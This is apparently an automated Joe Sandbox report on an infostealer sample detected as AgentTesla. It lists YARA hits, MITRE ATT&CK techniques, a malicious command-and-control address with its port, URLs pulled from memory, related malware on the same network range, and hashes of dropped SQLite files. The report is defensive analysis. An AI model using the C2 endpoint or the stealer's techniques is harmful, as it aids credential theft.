Source: Yara match	File source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9dOKGgFNL2.exe PID: 7712, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	1 Masquerading	1 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	3 Data from Local System	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	241 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	113 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9dOKGgFNL2.exe	67%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
9dOKGgFNL2.exe	62%	Virustotal		Browse
9dOKGgFNL2.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://45.137.22.126:55615/	0%	Avira URL Cloud	safe
http://45.137.22.126:55615t-fq	0%	Avira URL Cloud	safe
http://45.137.22.126:5	0%	Avira URL Cloud	safe
45.137.22.126:55615	0%	Avira URL Cloud	safe
http://45.137.22.126:55615	0%	Avira URL Cloud	safe
45.137.22.126:55615	3%	Virustotal		Browse
http://45.137.22.126:55615/	3%	Virustotal		Browse
http://45.137.22.126:5	2%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
45.137.22.126:55615	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://45.137.22.126:55615/	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	false		high
http://www.fontbureau.com/designersG	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	false		high
http://www.fontbureau.com/designers/?	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/envelope/	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.tiro.com	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	false		high
http://www.fontbureau.com/designers	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.137.22.126:5	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironment	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/SetEnvironmentResponse	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sajatypeworks.com	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdates	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.typography.netD	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.galapagosdesign.com/staff/dennis.htm	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.orgcookies//settinString.Removeg	9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	false		high
http://www.galapagosdesign.com/DPlease	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdate	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/0	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.zhongyicts.com.cn	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sakkal.com	9dOKGgFNL2.exe, 00000000.00000002.1742706998.0000000006474000.00000004.00000020.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ipinfo.io/ip%appdata%	9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/CheckConnectResponse	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.datacontract.org/2004/07/	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.ip.sb	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	false		high
http://tempuri.org/Endpoint/CheckConnect	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	false		high
http://45.137.22.126:55615t-fq	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnviron	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.carterandcone.coml	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers8	9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.dr	false		high
http://schemas.xmlsoap.org/soap/actor/next	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://45.137.22.126:55615	9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.137.22.126	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557008
Start date and time:	2024-11-17 03:06:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9dOKGgFNL2.exe renamed because original name is a hash value
Original Sample Name:	020ec1df3b8b9d28da16edaf0d50a262.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/43@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 80 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.26.13.31, 172.67.75.172, 104.26.12.31
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:06:58	API Interceptor	51x Sleep call for process: 9dOKGgFNL2.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.137.22.126	DEVIS + FACTURE.exe	Get hash	malicious	Remcos, GuLoader	Browse	pharmaciedelaplage.bounceme.net/KLnDNWENP155.bin

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ROOTLAYERNETNL	RFQ List and airflight 2024.pif.exe	Get hash	malicious	PureLog Stealer	Browse	45.137.22.174
	Calyciform.exe	Get hash	malicious	GuLoader	Browse	45.137.22.248
	I5pvP0CU6M.exe	Get hash	malicious	RedLine	Browse	45.137.22.248
	gLsenXDHxP.exe	Get hash	malicious	RedLine	Browse	185.222.58.240
	DEVIS + FACTURE.exe	Get hash	malicious	Remcos, GuLoader	Browse	45.137.22.126
	PZNfhfaj9O.exe	Get hash	malicious	RedLine	Browse	185.222.58.80
	ZxS8mP8uE6.exe	Get hash	malicious	RedLine	Browse	45.137.22.123
	nu28HwzQwC.exe	Get hash	malicious	RedLine	Browse	185.222.58.52
	DKO6uy1Tia.exe	Get hash	malicious	RedLine	Browse	45.137.22.70
	3BOCQ22aUs.ps1	Get hash	malicious	Unknown	Browse	45.137.20.45

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\tmp4513.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4514.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4525.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4526.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4536.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4537.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp4548.tmp

Download File

Process:	C:\Users\user\Desktop\9dOKGgFNL2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
